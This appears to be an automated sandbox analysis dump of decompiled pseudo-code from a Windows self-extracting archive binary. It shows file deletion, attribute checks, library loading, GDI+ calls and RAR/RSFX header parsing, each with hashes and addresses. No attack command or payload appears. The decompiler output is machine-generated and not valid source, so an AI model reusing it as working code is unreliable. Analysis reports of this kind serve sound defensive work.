                                                                            					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
                                                                            				}
                                                                            				return _t17;
                                                                            			}








                                                                            APIs
                                                                            • DeleteFileW.KERNELBASE(?,?,?,00199648,?,?,001994A3), ref: 00199E29
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00199648,?,?,001994A3), ref: 00199E57
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: DeleteFile
                                                                            • String ID:
                                                                            • API String ID: 4033686569-0
                                                                            • Opcode ID: ccba4fd9958893f07107902da8696e987669b1d59e73e577c77a09a5f9d4ac1d
                                                                            • Instruction ID: 114986b402e03cced054eae27e24557adbef07fb339fbad4121526caf9c899b2
                                                                            • Opcode Fuzzy Hash: ccba4fd9958893f07107902da8696e987669b1d59e73e577c77a09a5f9d4ac1d
                                                                            • Instruction Fuzzy Hash: 51E092355412096BDF01DF64EC45FEA775CBB09381F884066B888C2151DB71DDE5EAA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00199E7F(WCHAR* _a4) {
                                                                            				short _v4100;
                                                                            				long _t6;
                                                                            				long _t11;
                                                                            				long _t13;
                                                                            
                                                                            				E001AD940();
                                                                            				_t6 = GetFileAttributesW(_a4); // executed
                                                                            				_t13 = _t6;
                                                                            				if(_t13 == 0xffffffff && E0019B32C(_a4,  &_v4100, 0x800) != 0) {
                                                                            					_t11 = GetFileAttributesW( &_v4100); // executed
                                                                            					_t13 = _t11;
                                                                            				}
                                                                            				return _t13;
                                                                            			}








                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00199E74,?,001974F7,?,?,?,?), ref: 00199E90
                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00199E74,?,001974F7,?,?,?,?), ref: 00199EBC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 68552d62eaf99246144d93d6c423bc2972f4d15dbbaf6596797e158b06787553
                                                                            • Instruction ID: d22416ac3b49d9b615beb5c8e49babc6e6b1bcbcad712dfc84b54825a31b7ffd
                                                                            • Opcode Fuzzy Hash: 68552d62eaf99246144d93d6c423bc2972f4d15dbbaf6596797e158b06787553
                                                                            • Instruction Fuzzy Hash: 48E0653190011857CB10AA689C04BD97B58AB083A1F004162FD54D3191E7709D9586D0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0019FCFD(intOrPtr _a4) {
                                                                            				short _v4100;
                                                                            				struct HINSTANCE__* _t7;
                                                                            
                                                                            				E001AD940();
                                                                            				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
                                                                            				if(_t7 != 0) {
                                                                            					E0019B625( &_v4100, _a4,  &_v4100, 0x800);
                                                                            					_t7 = LoadLibraryW( &_v4100); // executed
                                                                            				}
                                                                            				return _t7;
                                                                            			}






                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0019FD18
                                                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0019E7F6,Crypt32.dll,?,0019E878,?,0019E85C,?,?,?,?), ref: 0019FD3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystem
                                                                            • String ID:
                                                                            • API String ID: 1175261203-0
                                                                            • Opcode ID: 7047c69ef3100db3c4c4b146424296281964826532a820cb97176b9adf316b69
                                                                            • Instruction ID: 3ea9e42db8a5544ca3afce5db1ccb6119a76f55472cf2cc601929e27039fe308
                                                                            • Opcode Fuzzy Hash: 7047c69ef3100db3c4c4b146424296281964826532a820cb97176b9adf316b69
                                                                            • Instruction Fuzzy Hash: B0E0127690011CABDB119A959C09FEA77ACEF09391F4400A6B948D2005DB74E990CBE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 73%
                                                                            			E001A938E(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                            				signed int _v8;
                                                                            				signed int* _t10;
                                                                            				signed int _t15;
                                                                            
                                                                            				_push(__ecx);
                                                                            				_t15 = __ecx;
                                                                            				_t10 =  &_v8;
                                                                            				_v8 = __ecx;
                                                                            				_v8 = _v8 & 0x00000000;
                                                                            				_push(_t10);
                                                                            				_push(_a4);
                                                                            				 *__ecx = 0x1c3398;
                                                                            				if(_a8 == 0) {
                                                                            					L001AD80E(); // executed
                                                                            				} else {
                                                                            					L001AD814();
                                                                            				}
                                                                            				 *((intOrPtr*)(_t15 + 8)) = _t10;
                                                                            				 *(_t15 + 4) = _v8;
                                                                            				return _t15;
                                                                            			}







                                                                            APIs
                                                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001A93AF
                                                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 001A93B6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: BitmapCreateFromGdipStream
                                                                            • String ID:
                                                                            • API String ID: 1918208029-0
                                                                            • Opcode ID: 642d5afd81a5305c2d705c2e20ffb692ca5cc1b5936f41fd0131d37c079edcc0
                                                                            • Instruction ID: 4117429e9857eec65eb7579659f062e58a79fa8bbae10daf7fa88d655871a8d1
                                                                            • Opcode Fuzzy Hash: 642d5afd81a5305c2d705c2e20ffb692ca5cc1b5936f41fd0131d37c079edcc0
                                                                            • Instruction Fuzzy Hash: E7E06D75801318EBCB20DFA9D501B99B7F8EF05320F10805EE84593600D770AE449BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E001A9B08(void* __ecx) {
                                                                            				intOrPtr _v16;
                                                                            				intOrPtr* _t5;
                                                                            				void* _t7;
                                                                            				void* _t11;
                                                                            				intOrPtr _t14;
                                                                            
                                                                            				 *[fs:0x0] = _t14;
                                                                            				_t5 =  *0x1d75c0; // 0x73f5c100
                                                                            				 *((intOrPtr*)( *_t5 + 8))(_t5, _t11,  *[fs:0x0], E001C1161, 0xffffffff);
                                                                            				L001AD826(); // executed
                                                                            				_t7 =  *0x1cdff0( *((intOrPtr*)(__ecx + 4))); // executed
                                                                            				 *[fs:0x0] = _v16;
                                                                            				return _t7;
                                                                            			}








                                                                            0x001a9b19
                                                                            0x001a9b20
                                                                            0x001a9b2b
                                                                            0x001a9b31
                                                                            0x001a9b36
                                                                            0x001a9b3f
                                                                            0x001a9b4a

                                                                            APIs
                                                                            • GdiplusShutdown.GDIPLUS(?,?,?,001C1161,000000FF), ref: 001A9B31
                                                                            • OleUninitialize.OLE32(?,?,?,001C1161,000000FF), ref: 001A9B36
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: GdiplusShutdownUninitialize
                                                                            • String ID:
                                                                            • API String ID: 3856339756-0
                                                                            • Opcode ID: 27effc16e88757cbfe45bb8435662a682f791c8df5dccb33acc436e8697aaec2
                                                                            • Instruction ID: c4c32f66c1e5221ee283c15d0d2c7e09fdd5b5ae3a9037ba7db833a1128e0f6d
                                                                            • Opcode Fuzzy Hash: 27effc16e88757cbfe45bb8435662a682f791c8df5dccb33acc436e8697aaec2
                                                                            • Instruction Fuzzy Hash: 55E01236544A449FC710DB48EC45F55B7E8F709B20F044769F51A83B50DB356800CAD1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 89%
                                                                            			E001B1726(void* __ecx, void* __eflags) {
                                                                            				intOrPtr _t1;
                                                                            				void* _t2;
                                                                            				void* _t9;
                                                                            
                                                                            				_t1 = E001B281A(__eflags, E001B166A); // executed
                                                                            				 *0x1cd680 = _t1;
                                                                            				if(_t1 != 0xffffffff) {
                                                                            					_t2 = E001B28C8(__eflags, _t1, 0x1f01dc);
                                                                            					_pop(_t9);
                                                                            					__eflags = _t2;
                                                                            					if(_t2 != 0) {
                                                                            						return 1;
                                                                            					} else {
                                                                            						E001B1759(_t9);
                                                                            						goto L1;
                                                                            					}
                                                                            				} else {
                                                                            					L1:
                                                                            					return 0;
                                                                            				}
                                                                            			}







                                                                            APIs
                                                                              • Part of subcall function 001B281A: try_get_function.LIBVCRUNTIME ref: 001B282F
                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001B1744
                                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 001B174F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                            • String ID:
                                                                            • API String ID: 806969131-0
                                                                            • Opcode ID: 8f20d9cbda472da96a5fd04d0bb0924aad315f7fa61255d8e76f1195a8224874
                                                                            • Instruction ID: 3a5155d0ecb6ce30aa744fb29fdb33e95fcd280599672ade05ca919c2d83d673
                                                                            • Opcode Fuzzy Hash: 8f20d9cbda472da96a5fd04d0bb0924aad315f7fa61255d8e76f1195a8224874
                                                                            • Instruction Fuzzy Hash: 10D0C965A58705389E047A7478739D93B8899227713F24A66F020CB4C2EF74804BA525
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 58%
                                                                            			E001912B2(struct HWND__* _a4, int _a8, signed char _a12) {
                                                                            				int _t8;
                                                                            
                                                                            				asm("sbb eax, eax");
                                                                            				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
                                                                            				return _t8;
                                                                            			}




                                                                            0x001912b9
                                                                            0x001912ce
                                                                            0x001912d4

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ItemShowWindow
                                                                            • String ID:
                                                                            • API String ID: 3351165006-0
                                                                            • Opcode ID: c4b223e0b321e5dc1b6a616b51a5878ba7a375307ad2ea285ba796131002df9b
                                                                            • Instruction ID: 9279d2ed5079dfcf773700f1831ca29b03c516fa691a33584cdb6fd258e02ff0
                                                                            • Opcode Fuzzy Hash: c4b223e0b321e5dc1b6a616b51a5878ba7a375307ad2ea285ba796131002df9b
                                                                            • Instruction Fuzzy Hash: 4DC01272058200BECB011BB0EC09D2EBFA8BBA4612F04C92CB0A6C08A0C238C090DB11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 95%
                                                                            			E00191973(intOrPtr* __ecx, intOrPtr __edx) {
                                                                            				signed int _t106;
                                                                            				intOrPtr _t109;
                                                                            				signed int _t110;
                                                                            				signed int _t112;
                                                                            				signed int _t116;
                                                                            				signed int _t119;
                                                                            				signed int _t127;
                                                                            				intOrPtr _t128;
                                                                            				char _t129;
                                                                            				char _t138;
                                                                            				intOrPtr _t143;
                                                                            				signed int _t144;
                                                                            				signed int _t145;
                                                                            				void* _t147;
                                                                            				signed int _t152;
                                                                            				signed int _t153;
                                                                            				signed int _t155;
                                                                            				void* _t159;
                                                                            				void* _t160;
                                                                            				signed int _t166;
                                                                            				intOrPtr* _t169;
                                                                            				signed int _t175;
                                                                            				void* _t176;
                                                                            				signed int _t178;
                                                                            				char* _t190;
                                                                            				intOrPtr _t191;
                                                                            				intOrPtr _t197;
                                                                            				intOrPtr* _t199;
                                                                            				signed int _t202;
                                                                            				void* _t204;
                                                                            				char* _t205;
                                                                            				intOrPtr _t206;
                                                                            				void* _t207;
                                                                            
                                                                            				_t197 = __edx;
                                                                            				_t169 = __ecx;
                                                                            				E001AD870(E001C1451, _t207);
                                                                            				_t199 = _t169;
                                                                            				_push(7);
                                                                            				_t164 = _t199 + 0x21f8;
                                                                            				_push(_t199 + 0x21f8);
                                                                            				 *((char*)(_t199 + 0x6cbc)) = 0;
                                                                            				 *((char*)(_t199 + 0x6cc4)) = 0;
                                                                            				if( *((intOrPtr*)( *_t199 + 0xc))() == 7) {
                                                                            					 *(_t199 + 0x6cc0) =  *(_t199 + 0x6cc0) & 0x00000000;
                                                                            					_t106 = E00191D09(_t164, 7);
                                                                            					__eflags = _t106;
                                                                            					if(_t106 == 0) {
                                                                            						E00196ED7(_t207 - 0x38, 0x200000);
                                                                            						 *(_t207 - 4) =  *(_t207 - 4) & 0x00000000;
                                                                            						_t109 =  *((intOrPtr*)( *_t199 + 0x14))();
                                                                            						_t197 =  *_t199;
                                                                            						 *((intOrPtr*)(_t207 - 0x18)) = _t109;
                                                                            						_t110 =  *((intOrPtr*)(_t197 + 0xc))( *((intOrPtr*)(_t207 - 0x38)),  *((intOrPtr*)(_t207 - 0x34)) + 0xfffffff0);
                                                                            						_t175 = _t110;
                                                                            						_t202 = 0;
                                                                            						 *(_t207 - 0x14) = _t175;
                                                                            						_t166 = 1;
                                                                            						__eflags = _t175;
                                                                            						if(_t175 <= 0) {
                                                                            							L22:
                                                                            							__eflags =  *(_t199 + 0x6cc0);
                                                                            							_t176 = _t207 - 0x38;
                                                                            							if( *(_t199 + 0x6cc0) != 0) {
                                                                            								_t37 = _t207 - 4; // executed
                                                                            								 *_t37 =  *(_t207 - 4) | 0xffffffff;
                                                                            								__eflags =  *_t37;
                                                                            								E0019159C(_t176); // executed
                                                                            								L25:
                                                                            								_t112 =  *(_t199 + 0x6cb0);
                                                                            								__eflags = _t112 - 4;
                                                                            								if(__eflags != 0) {
                                                                            									__eflags = _t112 - 3;
                                                                            									if(_t112 != 3) {
                                                                            										 *((intOrPtr*)(_t199 + 0x2200)) = 7;
                                                                            										L32:
                                                                            										 *((char*)(_t207 - 0xd)) = 0;
                                                                            										__eflags = E0019391A(_t199, _t197);
                                                                            										 *(_t207 - 0xe) = 0;
                                                                            										__eflags = 0 - 1;
                                                                            										if(0 != 1) {
                                                                            											L38:
                                                                            											_t116 =  *((intOrPtr*)(_t207 - 0xd));
                                                                            											L39:
                                                                            											_t178 =  *((intOrPtr*)(_t199 + 0x6cc5));
                                                                            											__eflags = _t178;
                                                                            											if(_t178 == 0) {
                                                                            												L41:
                                                                            												__eflags =  *((char*)(_t199 + 0x6cc4));
                                                                            												if( *((char*)(_t199 + 0x6cc4)) != 0) {
                                                                            													L43:
                                                                            													__eflags = _t178;
                                                                            													if(__eflags == 0) {
                                                                            														E0019134C(__eflags, 0x1b, _t199 + 0x1e);
                                                                            													}
                                                                            													__eflags =  *((char*)(_t207 + 8));
                                                                            													if( *((char*)(_t207 + 8)) != 0) {
                                                                            														L48:
                                                                            														__eflags =  *(_t207 - 0xe);
                                                                            														 *((char*)(_t199 + 0x6cb6)) =  *((intOrPtr*)(_t199 + 0x2224));
                                                                            														if( *(_t207 - 0xe) == 0) {
                                                                            															L69:
                                                                            															__eflags =  *((char*)(_t199 + 0x6cb5));
                                                                            															if( *((char*)(_t199 + 0x6cb5)) == 0) {
                                                                            																L71:
                                                                            																E0019FAB1(_t199 + 0x6cfa, _t199 + 0x1e, 0x800);
                                                                            																L72:
                                                                            																_t119 = _t166;
                                                                            																goto L73;
                                                                            															}
                                                                            															__eflags =  *((char*)(_t199 + 0x6cb9));
                                                                            															if( *((char*)(_t199 + 0x6cb9)) == 0) {
                                                                            																goto L72;
                                                                            															}
                                                                            															goto L71;
                                                                            														}
                                                                            														__eflags =  *((char*)(_t199 + 0x21e0));
                                                                            														if( *((char*)(_t199 + 0x21e0)) == 0) {
                                                                            															L51:
                                                                            															_t204 =  *((intOrPtr*)( *_t199 + 0x14))();
                                                                            															 *((intOrPtr*)(_t207 - 0x24)) = _t197;
                                                                            															 *((intOrPtr*)(_t207 + 8)) =  *((intOrPtr*)(_t199 + 0x6ca0));
                                                                            															 *((intOrPtr*)(_t207 - 0x18)) =  *((intOrPtr*)(_t199 + 0x6ca4));
                                                                            															 *(_t207 - 0x14) =  *(_t199 + 0x6ca8);
                                                                            															 *((intOrPtr*)(_t207 - 0x1c)) =  *((intOrPtr*)(_t199 + 0x6cac));
                                                                            															 *((intOrPtr*)(_t207 - 0x20)) =  *((intOrPtr*)(_t199 + 0x21dc));
                                                                            															while(1) {
                                                                            																_t127 = E0019391A(_t199, _t197);
                                                                            																__eflags = _t127;
                                                                            																if(_t127 == 0) {
                                                                            																	break;
                                                                            																}
                                                                            																_t128 =  *((intOrPtr*)(_t199 + 0x21dc));
                                                                            																__eflags = _t128 - 3;
                                                                            																if(_t128 != 3) {
                                                                            																	__eflags = _t128 - 2;
                                                                            																	if(_t128 == 2) {
                                                                            																		__eflags =  *((char*)(_t199 + 0x6cb5));
                                                                            																		if( *((char*)(_t199 + 0x6cb5)) == 0) {
                                                                            																			L66:
                                                                            																			_t129 = 0;
                                                                            																			__eflags = 0;
                                                                            																			L67:
                                                                            																			 *((char*)(_t199 + 0x6cb9)) = _t129;
                                                                            																			L68:
                                                                            																			 *((intOrPtr*)(_t199 + 0x6ca0)) =  *((intOrPtr*)(_t207 + 8));
                                                                            																			 *((intOrPtr*)(_t199 + 0x6ca4)) =  *((intOrPtr*)(_t207 - 0x18));
                                                                            																			 *(_t199 + 0x6ca8) =  *(_t207 - 0x14);
                                                                            																			 *((intOrPtr*)(_t199 + 0x6cac)) =  *((intOrPtr*)(_t207 - 0x1c));
                                                                            																			 *((intOrPtr*)(_t199 + 0x21dc)) =  *((intOrPtr*)(_t207 - 0x20));
                                                                            																			 *((intOrPtr*)( *_t199 + 0x10))(_t204,  *((intOrPtr*)(_t207 - 0x24)), 0);
                                                                            																			goto L69;
                                                                            																		}
                                                                            																		__eflags =  *((char*)(_t199 + 0x3318));
                                                                            																		if( *((char*)(_t199 + 0x3318)) != 0) {
                                                                            																			goto L66;
                                                                            																		}
                                                                            																		_t129 = _t166;
                                                                            																		goto L67;
                                                                            																	}
                                                                            																	__eflags = _t128 - 5;
                                                                            																	if(_t128 == 5) {
                                                                            																		goto L68;
                                                                            																	}
                                                                            																	L60:
                                                                            																	E00191E3B(_t199);
                                                                            																	continue;
                                                                            																}
                                                                            																__eflags =  *((char*)(_t199 + 0x6cb5));
                                                                            																if( *((char*)(_t199 + 0x6cb5)) == 0) {
                                                                            																	L56:
                                                                            																	_t138 = 0;
                                                                            																	__eflags = 0;
                                                                            																	L57:
                                                                            																	 *((char*)(_t199 + 0x6cb9)) = _t138;
                                                                            																	goto L60;
                                                                            																}
                                                                            																__eflags =  *((char*)(_t199 + 0x5668));
                                                                            																if( *((char*)(_t199 + 0x5668)) != 0) {
                                                                            																	goto L56;
                                                                            																}
                                                                            																_t138 = _t166;
                                                                            																goto L57;
                                                                            															}
                                                                            															goto L68;
                                                                            														}
                                                                            														__eflags =  *((char*)(_t199 + 0x6cbc));
                                                                            														if( *((char*)(_t199 + 0x6cbc)) != 0) {
                                                                            															goto L69;
                                                                            														}
                                                                            														goto L51;
                                                                            													} else {
                                                                            														L46:
                                                                            														_t119 = 0;
                                                                            														L73:
                                                                            														L74:
                                                                            														 *[fs:0x0] =  *((intOrPtr*)(_t207 - 0xc));
                                                                            														return _t119;
                                                                            													}
                                                                            												}
                                                                            												__eflags = _t116;
                                                                            												if(_t116 != 0) {
                                                                            													goto L48;
                                                                            												}
                                                                            												goto L43;
                                                                            											}
                                                                            											__eflags =  *((char*)(_t207 + 8));
                                                                            											if( *((char*)(_t207 + 8)) == 0) {
                                                                            												goto L46;
                                                                            											}
                                                                            											goto L41;
                                                                            										}
                                                                            										__eflags = 0;
                                                                            										 *((char*)(_t207 - 0xd)) = 0;
                                                                            										while(1) {
                                                                            											E00191E3B(_t199);
                                                                            											_t143 =  *((intOrPtr*)(_t199 + 0x21dc));
                                                                            											__eflags = _t143 - _t166;
                                                                            											if(_t143 == _t166) {
                                                                            												break;
                                                                            											}
                                                                            											__eflags =  *((char*)(_t199 + 0x21e0));
                                                                            											if( *((char*)(_t199 + 0x21e0)) == 0) {
                                                                            												L37:
                                                                            												_t144 = E0019391A(_t199, _t197);
                                                                            												__eflags = _t144;
                                                                            												_t145 = _t144 & 0xffffff00 | _t144 != 0x00000000;
                                                                            												 *(_t207 - 0xe) = _t145;
                                                                            												__eflags = _t145 - 1;
                                                                            												if(_t145 == 1) {
                                                                            													continue;
                                                                            												}
                                                                            												goto L38;
                                                                            											}
                                                                            											__eflags = _t143 - 4;
                                                                            											if(_t143 == 4) {
                                                                            												break;
                                                                            											}
                                                                            											goto L37;
                                                                            										}
                                                                            										_t116 = _t166;
                                                                            										goto L39;
                                                                            									}
                                                                            									_t205 = _t199 + 0x21ff;
                                                                            									_t147 =  *((intOrPtr*)( *_t199 + 0xc))(_t205, _t166);
                                                                            									__eflags = _t147 - _t166;
                                                                            									if(_t147 != _t166) {
                                                                            										goto L46;
                                                                            									}
                                                                            									__eflags =  *_t205;
                                                                            									if( *_t205 != 0) {
                                                                            										goto L46;
                                                                            									}
                                                                            									 *((intOrPtr*)(_t199 + 0x2200)) = 8;
                                                                            									goto L32;
                                                                            								}
                                                                            								E0019134C(__eflags, 0x3c, _t199 + 0x1e);
                                                                            								goto L46;
                                                                            							}
                                                                            							E0019159C(_t176);
                                                                            							goto L46;
                                                                            						} else {
                                                                            							goto L6;
                                                                            						}
                                                                            						do {
                                                                            							L6:
                                                                            							_t190 =  *((intOrPtr*)(_t207 - 0x38)) + _t202;
                                                                            							__eflags =  *_t190 - 0x52;
                                                                            							if( *_t190 != 0x52) {
                                                                            								goto L17;
                                                                            							}
                                                                            							_t152 = E00191D09(_t190, _t110 - _t202);
                                                                            							__eflags = _t152;
                                                                            							if(_t152 == 0) {
                                                                            								L16:
                                                                            								_t110 =  *(_t207 - 0x14);
                                                                            								goto L17;
                                                                            							}
                                                                            							_t191 =  *((intOrPtr*)(_t207 - 0x18));
                                                                            							 *(_t199 + 0x6cb0) = _t152;
                                                                            							__eflags = _t152 - _t166;
                                                                            							if(_t152 != _t166) {
                                                                            								L19:
                                                                            								_t197 =  *_t199;
                                                                            								_t153 = _t202 + _t191;
                                                                            								 *(_t199 + 0x6cc0) = _t153;
                                                                            								 *((intOrPtr*)(_t197 + 0x10))(_t153, 0, 0);
                                                                            								_t155 =  *(_t199 + 0x6cb0);
                                                                            								__eflags = _t155 - 2;
                                                                            								if(_t155 == 2) {
                                                                            									L21:
                                                                            									 *((intOrPtr*)( *_t199 + 0xc))(_t199 + 0x21f8, 7);
                                                                            									goto L22;
                                                                            								}
                                                                            								__eflags = _t155 - 3;
                                                                            								if(_t155 != 3) {
                                                                            									goto L22;
                                                                            								}
                                                                            								goto L21;
                                                                            							}
                                                                            							__eflags = _t202;
                                                                            							if(_t202 <= 0) {
                                                                            								goto L19;
                                                                            							}
                                                                            							__eflags = _t191 - 0x1c;
                                                                            							if(_t191 >= 0x1c) {
                                                                            								goto L19;
                                                                            							}
                                                                            							__eflags =  *(_t207 - 0x14) - 0x1f;
                                                                            							if( *(_t207 - 0x14) <= 0x1f) {
                                                                            								goto L19;
                                                                            							}
                                                                            							_t159 =  *((intOrPtr*)(_t207 - 0x38)) - _t191;
                                                                            							__eflags =  *((char*)(_t159 + 0x1c)) - 0x52;
                                                                            							if( *((char*)(_t159 + 0x1c)) != 0x52) {
                                                                            								goto L16;
                                                                            							}
                                                                            							__eflags =  *((char*)(_t159 + 0x1d)) - 0x53;
                                                                            							if( *((char*)(_t159 + 0x1d)) != 0x53) {
                                                                            								goto L16;
                                                                            							}
                                                                            							__eflags =  *((char*)(_t159 + 0x1e)) - 0x46;
                                                                            							if( *((char*)(_t159 + 0x1e)) != 0x46) {
                                                                            								goto L16;
                                                                            							}
                                                                            							__eflags =  *((char*)(_t159 + 0x1f)) - 0x58;
                                                                            							if( *((char*)(_t159 + 0x1f)) == 0x58) {
                                                                            								goto L19;
                                                                            							}
                                                                            							goto L16;
                                                                            							L17:
                                                                            							_t202 = _t202 + 1;
                                                                            							__eflags = _t202 - _t110;
                                                                            						} while (_t202 < _t110);
                                                                            						goto L22;
                                                                            					}
                                                                            					 *(_t199 + 0x6cb0) = _t106;
                                                                            					_t166 = 1;
                                                                            					__eflags = _t106 - 1;
                                                                            					if(_t106 == 1) {
                                                                            						_t206 =  *_t199;
                                                                            						_t160 =  *((intOrPtr*)(_t206 + 0x14))(0);
                                                                            						asm("sbb edx, 0x0");
                                                                            						 *((intOrPtr*)(_t206 + 0x10))(_t160 - 7, _t197);
                                                                            					}
                                                                            					goto L25;
                                                                            				}
                                                                            				_t119 = 0;
                                                                            				goto L74;
                                                                            			}




































                                                                            0x00191ab6
                                                                            0x00000000
                                                                            0x00191ab6
                                                                            0x00191aa4
                                                                            0x00191aa7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00191aa7
                                                                            0x00191a4e
                                                                            0x00191a50
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00191a52
                                                                            0x00191a55
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00191a57
                                                                            0x00191a5b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00191a60
                                                                            0x00191a62
                                                                            0x00191a66
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00191a68
                                                                            0x00191a6c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00191a6e
                                                                            0x00191a72
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00191a74
                                                                            0x00191a78
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00191a7d
                                                                            0x00191a7d
                                                                            0x00191a7e
                                                                            0x00191a7e
                                                                            0x00000000
                                                                            0x00191a82
